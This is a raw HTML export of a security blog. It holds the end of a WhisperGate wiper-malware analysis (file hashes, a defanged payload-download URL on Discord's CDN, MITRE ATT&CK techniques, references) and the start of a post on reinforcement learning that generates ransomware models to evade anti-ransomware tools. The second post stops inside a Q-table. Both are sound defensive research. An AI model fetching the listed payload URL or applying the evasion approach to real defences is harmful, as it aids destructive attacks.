href="https://www.virustotal.com/gui/file/923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Tbopbh.jpg</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Frkmlkdkdubkznbkmcf.dll</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">AdvancedRun.exe</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Nmddfrqqrbyjeygggda.vbs</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">DB5A204A34969F60FE4A653F51D64EEE024DBF018EDEA334E8B3DF780EDA846F</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3" style="text-decoration-line: none;"><span face="Roboto, sans-serif" style="background-color: white; color: #1155cc; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">InstallUtil.exe</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3</span></p></td></tr></tbody></table></div><br /><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Network indicators</span></h3><br /><div align="left" dir="ltr" style="margin-left: 0.75pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="98"></col><col width="505"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Type</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: white; color: #24292e; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Data</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">URL </span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https[:]//cdn[.]discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg</span></p></td></tr></tbody></table></div><br /><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">MITRE attack techniques</span></h3><br /><div align="left" dir="ltr" style="margin-left: 0.75pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="149"></col><col width="499"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Tactic</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Technique</span></p></td></tr><tr style="height: 23.0991pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Execution</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1059/003" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1059.003 - Windows Command Shell</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1059/001/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1059.001 – Command and Scripting Interpreter: PowerShell</span></a></p></td></tr><tr style="height: 25.5pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Defense evasion</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1542/003/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1542.003 – Pre-OS Boot: Bootkit</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1027/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1027 – Obfuscated Files or Information</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1055/012/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1055.012 – Process Injection: Process Hollowing</span></a></p></td></tr><tr style="height: 24.0912pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovery</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1083/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1083 – File and Directory Discovery</span></a></p></td></tr><tr style="height: 24pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Command and Control</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1105/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1105 – Ingress Tool Transfer</span></a></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Impact</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1485/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1485 – Data Destruction</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1561/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1561 – Disk Wipe</span></a></p></td></tr></tbody></table></div><br /><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">References</span></h2><ol style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">Lecture recording <a href="https://www.youtube.com/watch?v=XxN4cINiLqA">https://www.youtube.com/watch?v=XxN4cINiLqA</a></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/</span></a></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.bleepingcomputer.com/news/security/microsoft-fake-ransomware-targets-ukraine-in-data-wiping-attacks/" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.bleepingcomputer.com/news/security/microsoft-fake-ransomware-targets-ukraine-in-data-wiping-attacks/</span></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3</span></a></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://cert.gov.ua/article/18101">https://cert.gov.ua/article/18101</a> </span></p></li></ol><br /><br /><br /><br />Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-14480479319314188732020-10-02T09:29:00.008-07:002021-11-20T00:38:00.246-08:00Reinforcement Learning for Anti-Ransomware Testing<p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivABqz0gH4SztkQ9P7UKudP4L-FXBYKZGx4SVTkH5Y4wY4yRCh2rUtJtBa7pASOSrdv4KHIO3wf5RkEdUatDXIZMZnI3vwOjB0edtPxOpkrh3ROINidnAa1_g28JsUASakV95XIKEdZ7hI/s1530/RanSim.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="838" data-original-width="1530" height="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivABqz0gH4SztkQ9P7UKudP4L-FXBYKZGx4SVTkH5Y4wY4yRCh2rUtJtBa7pASOSrdv4KHIO3wf5RkEdUatDXIZMZnI3vwOjB0edtPxOpkrh3ROINidnAa1_g28JsUASakV95XIKEdZ7hI/w640-h350/RanSim.png" width="640" /></a></div></div><br /><br />ML models have recommended themselves as a powerful tool for cyberdefense. AI/ML is heavily used in antiviruses (EDR), Next-Gen Firewalls, and SIEM (SOAR) solutions to solve the classification problem as well as to discover anomalous behavior that may indicate a presence of an attacker with the help of Supervised and Unsupervised Learning. Deep Learning helps to filter spam emails and mark fake news to protect users against disinformation [1].<p></p><span><a name='more'></a></span><p>So what about AI in security testing such as penetration and anti-malware testing? The interesting application of AI can be found in the work called ‘Autonomous Penetration Testing using Reinforcement Learning’ by J. Schwartz from the University of Queensland [2] where he proposes to use Reinforcement Learning (RL) for network penetration testing to find the optimal attack path.</p><span id="docs-internal-guid-cb93a4dc-7fff-cf65-0ecd-8bed8bf1c779"><div>We decided to investigate the capabilities of applying ML in testing anti-ransomware solutions. In particular, RL has been chosen for generating ransomware models and finding the optimal test strategy to bypass an anti-ransomware solution. </div><div><br /></div><div>RL is well known as the way to train a computer to play strategy games. For example, AlphaGo, a computer program designed by DeepMind, has established itself as the best Go and chess player in the world as a result of playing many times with other instances of itself to improve its play with RL [3]. </div><div><br /></div><div>Download the <a href="https://drive.google.com/file/d/1RRXGInCt8lapn-MSUTUKlRWPiV7I-Tih/view?usp=sharing">slides</a>.</div><div>Video: <a href="https://www.youtube.com/watch?v=-jtjCjc3r9I">https://www.youtube.com/watch?v=-jtjCjc3r9I</a></div><div>The paper (PDF): <a href="https://ieeexplore.ieee.org/document/9225141">https://ieeexplore.ieee.org/document/9225141</a></div><div>Ransomware simulator <a href="https://youtu.be/SoRz1ls2kZQ" target="_blank">demo</a>.</div><div><br /></div><div>Some of the research results are highlighted below:</div><div><span id="docs-internal-guid-7f4518fc-7fff-f9e9-841f-dfaf70220e05"><img height="332" src="https://lh5.googleusercontent.com/2H56ONDUFtcAHT1kif0wDY1IKCfXL0CC4Jj0Cx64Ob3UO35jWLtTeUAzn0L2pl19VR_MJsP4z5GAdgVSUanXzpVMIDm_ExoJmEmAV1xsbBJ_qEdkPfGv4EOgt6DoNALhcOi7xiRiY9A=w640-h332" title="Chart" width="640" /></span></div><div><span><img height="401px;" src="https://lh4.googleusercontent.com/ks-OksfKy8209UZGqe3pt9H1P68lfoiPQIvwHcGT14c_Jxj7oCL9wsATqmOr0EQEN62f7GTSN7OvyZrK38vr73H095sQPv7sAMrsWOepR8U1KG9UVoriNdCEllLkRXkACR1qKWtnKEg" title="Chart" width="649px;" /></span></div><div><br /></div><div><span id="docs-internal-guid-6f957a6e-7fff-c296-cea4-f8cd55d5e4b2"><img height="329" src="https://lh3.googleusercontent.com/Flx4aQHx9SXTOpn4DqDz9WuLFr_gGrlDXX1zI7k4FvBQFSVSmuv9aPrFt1fRmmHupbw13oQC2LoA6pliko6lE4Z6CWJNl9kIDKCmV6OOjfCy34zUDOT3Gsv2V0LFiIYwAEuopLs8-yw=w640-h329" title="Chart" width="640" /></span></div><div><span><google-sheets-html-origin><table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="border-collapse: collapse; border: none; font-family: Arial; font-size: 10pt; table-layout: fixed; width: 0px;" xmlns="http://www.w3.org/1999/xhtml"><colgroup><col width="100"></col><col width="76"></col><col width="82"></col><col width="86"></col><col width="75"></col><col width="76"></col><col width="77"></col><col width="80"></col><col width="75"></col><col width="77"></col><col width="71"></col><col width="60"></col></colgroup><tbody><tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Q (S, A)"}" style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Q (S, A)</td><td data-sheets-value="{"1":2,"2":"States"}" style="background-color: #c9daf8; border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">States</td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="{"1":2,"2":"Threshold"}" style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Threshold</td><td style="border-color: rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td><td style="border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(204, 204, 204) rgb(204, 204, 204); border-image: initial; border-style: solid; border-width: 1px; overflow: hidden; padding: 2px 3px; vertical-align: bottom;"></td></tr><tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Actions"}" style="background-color: #ead1dc; border-color: rgb(204, 204, 204) rgb(204, 204, 204) rgb(204, 204, 204) rgb(0, 0, 0); border-image: initial; border-style: solid; border-width: 1px; font-weight: bold; overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">Actions</td><td data-sheets-value="{"1":3,"3":0}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">0</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":1}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); overflow: hidden; padding: 2px 3px; text-align: center; vertical-align: bottom;">1</td><td data-sheets-formula="=R[0]C[-1]+1" data-sheets-value="{"1":3,"3":2}" style="background-color: #c9daf8; border: 1px solid rgb(204, 204, 204); 